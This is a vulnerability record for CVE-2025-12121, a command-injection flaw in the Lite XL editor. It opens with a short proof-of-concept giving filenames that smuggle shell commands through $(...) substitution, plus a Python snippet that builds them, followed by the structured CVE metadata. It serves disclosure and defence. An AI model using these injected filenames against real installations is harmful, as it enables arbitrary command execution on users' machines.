CVE-2025-12121

# CVE-2025-12121 PoC - Lite XL Command Injection # Affected: Lite XL <= 2.1.8 # Attack Vector: Create a malicious filename with shell commands # Method 1: Via drag-and-drop (rootview.lua) # Create a file with malicious name in project directory malicious_filename = 'test$(touch /tmp/pwned).txt' # When user drags this file, arbitrary command executes # Method 2: Via treeview "Open in System" (treeview.lua) # Similar payload in file name malicious_file = '$(calc.exe).txt' # Method 3: Via project directory launching (core.lua) # Create malicious entry in project configuration # The path will be passed to system.exec without sanitization # Exploitation example (Unix-like systems): # touch 'test$(whoami>pwned).txt' # When processed by Lite XL, the command in $() will execute # Python PoC to generate malicious filenames: import os payload = '$(echo PWNED > /tmp/cve-2025-12121)' malicious_name = f'malicious_file{payload}.txt' print(f'Malicious filename: {malicious_name}') # When Lite XL processes this filename via system.exec, # the command inside $() will be executed

{"cve": {"id": "CVE-2025-12121", "sourceIdentifier": "[email protected]", "published": "2025-11-20T17:15:48.787", "lastModified": "2025-12-10T17:45:48.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lite XL versions 2.1.8 and prior contain a vulnerability in the system.exec function, which allowed arbitrary command execution through unsanitized shell command construction. This function was used in project directory launching (core.lua), drag-and-drop file handling (rootview.lua), and the “open in system” command in the treeview plugin (treeview.lua). If an attacker could influence input to system.exec, they might execute arbitrary commands with the privileges of the Lite XL process."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lite-xl:lite_xl:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.1.8", "matchCriteriaId": "9F99F77B-6033-461A-95F8-0C1BEB732101"}]}]}], "references": [{"url": "https://github.com/lite-xl/lite-xl/pull/2163", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://kb.cert.org/vuls/id/579478", "source": "[email protected]", "tags": ["Exploit", "Patch", "Third Party Advisory"]}]}}